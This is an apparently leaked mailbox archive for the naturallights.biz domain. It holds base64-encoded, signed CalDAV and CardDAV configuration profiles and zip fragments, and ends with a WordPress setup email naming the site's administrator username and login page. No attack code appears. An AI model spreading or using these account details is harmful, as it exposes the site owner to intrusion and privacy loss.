PC9rZXk+DQogICAgICAgIDxzdHJpbmc+aW5mb0BuYXR1cmFsbGlnaHRzLmJpeiBTZWN1cmUgQ2Fs ZW5kYXIgU2V0dXA8L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkRGlzcGxheU5hbWU8L2tl eT4NCiAgICAgICAgPHN0cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6IFNlY3VyZSBDYWxlbmRh ciBTZXR1cDwvc3RyaW5nPg0KICAgICAgICA8a2V5PlBheWxvYWRJZGVudGlmaWVyPC9rZXk+DQog ICAgICAgIDxzdHJpbmc+Y3BhbmVsLm1haWwub3JnLmluZm8ubmF0dXJhbGxpZ2h0cy5iaXo8L3N0 cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkT3JnYW5pemF0aW9uPC9rZXk+DQogICAgICAgIDxz dHJpbmc+bmF0dXJhbGxpZ2h0cy5iaXo8L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkVHlw ZTwva2V5Pg0KICAgICAgICA8c3RyaW5nPmNvbS5hcHBsZS5jYWxkYXYuYWNjb3VudDwvc3RyaW5n Pg0KICAgICAgICA8a2V5PlBheWxvYWRVVUlEPC9rZXk+DQogICAgICAgIDxzdHJpbmc+NTE0MTY2 YmItOWZlMS1jMmJkLTc3M2UtZmYzNjRiYzA5OTA2PC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5 bG9hZFZlcnNpb248L2tleT4NCiAgICAgICAgPGludGVnZXI+MTwvaW50ZWdlcj4NCiAgICA8L2Rp Y3Q+DQogIDwvYXJyYXk+DQogIDxrZXk+UGF5bG9hZERlc2NyaXB0aW9uPC9rZXk+DQogIDxzdHJp bmc+aW5mb0BuYXR1cmFsbGlnaHRzLmJpeiBTZWN1cmUgQ2FsZW5kYXIgU2V0dXA8L3N0cmluZz4N CiAgPGtleT5QYXlsb2FkRGlzcGxheU5hbWU8L2tleT4NCiAgPHN0cmluZz5pbmZvQG5hdHVyYWxs aWdodHMuYml6IFNlY3VyZSBDYWxlbmRhciBTZXR1cDwvc3RyaW5nPg0KICA8a2V5PlBheWxvYWRJ ZGVudGlmaWVyPC9rZXk+DQogIDxzdHJpbmc+Y3BhbmVsLm1haWwub3JnLmluZm8ubmF0dXJhbGxp Z2h0cy5iaXotY2FsZGF2PC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZE9yZ2FuaXphdGlvbjwva2V5 Pg0KICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5pbmZvLm5hdHVyYWxsaWdodHMuYml6PC9zdHJp bmc+DQogIDxrZXk+UGF5bG9hZFJlbW92YWxEaXNhbGxvd2VkPC9rZXk+DQogIDxmYWxzZS8+DQog IDxrZXk+UGF5bG9hZFR5cGU8L2tleT4NCiAgPHN0cmluZz5Db25maWd1cmF0aW9uPC9zdHJpbmc+ DQogIDxrZXk+UGF5bG9hZFVVSUQ8L2tleT4NCiAgPHN0cmluZz45MzlkMmFlNC0yNTZiLTFlNzAt ZWY3ZS0wYTcwZTJjOTU0ZmQ8L3N0cmluZz4NCiAgPGtleT5QYXlsb2FkVmVyc2lvbjwva2V5Pg0K ICA8aW50ZWdlcj4xPC9pbnRlZ2VyPg0KPC9kaWN0Pg0KPC9wbGlzdD4NCqCCCgQwggUFMIIC7aAD AgECAhBLqFKT95ovonMGS6gEjXXQMA0GCSqGSIb3DQEBCwUAME8xCzAJBgNVBAYTAlVTMSkwJwYD VQQKEyBJbnRlcm5ldCBTZWN1cml0eSBSZXNlYXJjaCBHcm91cDEVMBMGA1UEAxMMSVNSRyBSb290 IFgxMB4XDTI0MDMxMzAwMDAwMFoXDTI3MDMxMjIzNTk1OVowMzELMAkGA1UEBhMCVVMxFjAUBgNV BAoTDUxldCdzIEVuY3J5cHQxDDAKBgNVBAMTA1IxMDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAM9X5ebEVBLttEf+ySdYdkZQKIwdPojfBZ3VtRgpvd21Wr/69s6jvq8AIUtiWlo8AS/F WAP2if+OEUPrwbXgFAeWj28f1+e6gTkJdWW3wq8YWzcmKOej9AcrbRr/q1i8la5A/+nLV8S1W394 DRhhvBfnVMa7SZHNbhjRgIXupmU2vHTqvFBM6vwh8zgWk5S6sNNrOAbNFhJ6ylJ1yK12ssKcXZhF XG9he8Yt7jwTUoYB2VfmOBzfjbUfkpGa50oczEWoclXwsOajB+z9pxtmnj9Ii3GEcVjJOvrvXvJb RCs8dOePskfBB2rNmrcNlvcSgSZRVArsYfb39eLyisiVDY0CAwEAAaOB+DCB9TAOBgNVHQ8BAf8E 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 qZ0grTsIs5Muc61uCK3gefETJbiBW15Bdgc= --mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738 Content-Type: application/octet-stream; x-unix-mode=0600; name="carddav-info@naturallights.biz.mobileconfig" Content-Disposition: attachment; filename="carddav-info@naturallights.biz.mobileconfig" Content-Transfer-Encoding: base64 MIIT6gYJKoZIhvcNAQcCoIIT2zCCE9cCAQExDzANBglghkgBZQMEAgEFADCCB1gGCSqGSIb3DQEH AaCCB0kEggdFPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhRE9DVFlQ RSBwbGlzdCBQVUJMSUMgIi0vL0FwcGxlLy9EVEQgUExJU1QgMS4wLy9FTiIgImh0dHA6Ly93d3cu YXBwbGUuY29tL0RURHMvUHJvcGVydHlMaXN0LTEuMC5kdGQiPg0KPHBsaXN0IHZlcnNpb249IjEu MCI+DQo8ZGljdD4NCiAgPGtleT5QYXlsb2FkQ29udGVudDwva2V5Pg0KICA8YXJyYXk+DQogICAg PGRpY3Q+DQogICAgICAgIDxrZXk+Q2FyZERBVkFjY291bnREZXNjcmlwdGlvbjwva2V5Pg0KICAg ICAgICA8c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXogU2VjdXJlIENvbnRhY3RzIFNldHVw PC9zdHJpbmc+DQogICAgICAgIDxrZXk+Q2FyZERBVkhvc3ROYW1lPC9rZXk+DQogICAgICAgIDxz dHJpbmc+bWdoLXdlYjExLm1hZ2hvc3Qucm86MjA4MDwvc3RyaW5nPg0KICAgICAgICA8a2V5PkNh cmREQVZVc2VTU0w8L2tleT4NCiAgICAgICAgPHRydWUvPg0KICAgICAgICA8a2V5PkNhcmREQVZV c2VybmFtZTwva2V5Pg0KICAgICAgICA8c3RyaW5nPmluZm9AbmF0dXJhbGxpZ2h0cy5iaXo8L3N0 cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkRGVzY3JpcHRpb248L2tleT4NCiAgICAgICAgPHN0 cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6IFNlY3VyZSBDb250YWN0cyBTZXR1cDwvc3RyaW5n Pg0KICAgICAgICA8a2V5PlBheWxvYWREaXNwbGF5TmFtZTwva2V5Pg0KICAgICAgICA8c3RyaW5n PkNhcmREQVY8L3N0cmluZz4NCiAgICAgICAgPGtleT5QYXlsb2FkSWRlbnRpZmllcjwva2V5Pg0K ICAgICAgICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5pbmZvLm5hdHVyYWxsaWdodHMuYml6PC9z dHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZE9yZ2FuaXphdGlvbjwva2V5Pg0KICAgICAgICA8 c3RyaW5nPm5hdHVyYWxsaWdodHMuYml6PC9zdHJpbmc+DQogICAgICAgIDxrZXk+UGF5bG9hZFR5 cGU8L2tleT4NCiAgICAgICAgPHN0cmluZz5jb20uYXBwbGUuY2FyZGRhdi5hY2NvdW50PC9zdHJp bmc+DQogICAgICAgIDxrZXk+UGF5bG9hZFVVSUQ8L2tleT4NCiAgICAgICAgPHN0cmluZz5iZGJj ZDkwYS0zNzcyLWYxNzMtZDc4ZS1mYjNmNDJjZDI0N2U8L3N0cmluZz4NCiAgICAgICAgPGtleT5Q YXlsb2FkVmVyc2lvbjwva2V5Pg0KICAgICAgICA8aW50ZWdlcj4xPC9pbnRlZ2VyPg0KICAgIDwv ZGljdD4NCiAgPC9hcnJheT4NCiAgPGtleT5QYXlsb2FkRGVzY3JpcHRpb248L2tleT4NCiAgPHN0 cmluZz5pbmZvQG5hdHVyYWxsaWdodHMuYml6IFNlY3VyZSBDb250YWN0cyBTZXR1cDwvc3RyaW5n Pg0KICA8a2V5PlBheWxvYWREaXNwbGF5TmFtZTwva2V5Pg0KICA8c3RyaW5nPmluZm9AbmF0dXJh bGxpZ2h0cy5iaXogU2VjdXJlIENvbnRhY3RzIFNldHVwPC9zdHJpbmc+DQogIDxrZXk+UGF5bG9h ZElkZW50aWZpZXI8L2tleT4NCiAgPHN0cmluZz5jcGFuZWwubWFpbC5vcmcuaW5mby5uYXR1cmFs bGlnaHRzLmJpei1jYXJkZGF2PC9zdHJpbmc+DQogIDxrZXk+UGF5bG9hZE9yZ2FuaXphdGlvbjwv a2V5Pg0KICA8c3RyaW5nPmNwYW5lbC5tYWlsLm9yZy5pbmZvLm5hdHVyYWxsaWdodHMuYml6PC9z dHJpbmc+DQogIDxrZXk+UGF5bG9hZFJlbW92YWxEaXNhbGxvd2VkPC9rZXk+DQogIDxmYWxzZS8+ DQogIDxrZXk+UGF5bG9hZFR5cGU8L2tleT4NCiAgPHN0cmluZz5Db25maWd1cmF0aW9uPC9zdHJp bmc+DQogIDxrZXk+UGF5bG9hZFVVSUQ8L2tleT4NCiAgPHN0cmluZz5kNjYwZjM0Mi01NWM5LTYw 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 jXD+HITjshWxo+Denu8h43U0FsAIbQJux/CGar8= --mixed-Cpanel::Email::Object-3239878-1726668495-0.249595216632738-- PK ���Ye��w w @ 1726838628.M287187P3925255.mgh-web11.maghost.ro,S=1399,W=1439:2,nu ��٘� Return-Path: <logoandw@mgh-web11.maghost.ro> Delivered-To: info@naturallights.biz Received: from mgh-web11.maghost.ro by mgh-web11.maghost.ro with LMTP id MOERD2R37WYH5TsAJwI5NA (envelope-from <logoandw@mgh-web11.maghost.ro>) for <info@naturallights.biz>; Fri, 20 Sep 2024 16:23:48 +0300 Return-path: <logoandw@mgh-web11.maghost.ro> Envelope-to: info@naturallights.biz Delivery-date: Fri, 20 Sep 2024 16:23:48 +0300 Received: from logoandw by mgh-web11.maghost.ro with local (Exim 4.97.1) (envelope-from <logoandw@mgh-web11.maghost.ro>) id 1srdbw-0000000GTH6-0dww for info@naturallights.biz; Fri, 20 Sep 2024 16:23:48 +0300 To: info@naturallights.biz Subject: New WordPress Site X-PHP-Originating-Script: 1046:PHPMailer.php Date: Fri, 20 Sep 2024 13:23:48 +0000 From: WordPress <wordpress@naturallights.biz> Message-ID: <RJIgiGAZfn7QEYX4Ae0UvjHRe8WdbSYThAw9VyOq88w@naturallights.biz> X-Mailer: PHPMailer 6.9.1 (https://github.com/PHPMailer/PHPMailer) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Your new WordPress site has been successfully set up at: https://naturallights.biz You can log in to the administrator account with the following information: Username: admin_50lv5i3a Password: The password you chose during installation. Log in here: https://naturallights.biz/wp-login.php We hope you enjoy your new site. Thanks! --The WordPress Team https://wordpress.org/ PK ���Yj��z z >